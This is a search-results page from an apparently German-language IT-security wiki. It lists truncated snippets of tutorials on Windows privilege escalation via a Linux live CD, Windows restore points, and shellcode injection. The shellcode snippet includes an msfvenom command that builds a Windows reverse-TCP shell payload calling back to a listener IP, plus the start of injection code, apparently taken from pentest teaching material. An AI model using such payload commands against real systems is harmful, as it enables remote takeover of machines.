windows

Suche

Unten sind die Ergebnisse Ihrer Suche gelistet.

Privilege escalation: Windows admin thanks to Linux @en:it-security:blog
8 Treffer, Zuletzt geändert:
{{tag>it-security windows linux blog english}} ====== Privilege escalation: Windows admin thanks to Linux ====== In this tutorial, ... ll show you how to secure administrator rights on Windows PCs using a live boot CD. We will simulate two sc... ystem. \\ \\ ===== Initial situation ===== On a Windows system, the users ''users'' and ''sysadmin'' are
Windows restore points @en:windows
7 Treffer, Zuletzt geändert:
{{tag>Windows Windows11 english startpage}} ====== Windows restore points ====== ===== Open System Restore ===== Go to the set... point'' and open the following search result: {{windows:sysrestore-1.png?400|}} You will be taken to the
Shellcode Injection Part 1 @en:it-security:blog
6 Treffer, Zuletzt geändert:
{{tag>it-security windows kali pentest blog english}} ====== Shellcode Injection Part 1 ====== In this ser... ve to the file shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.23.61.130 LPORT=445 -... ocess-injection.cpp> #include <stdio.h> #include <Windows.h> //shell.c unsigned const char payload[] = "\... shellcode in raw format: <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.23.61.130 LPORT=445 -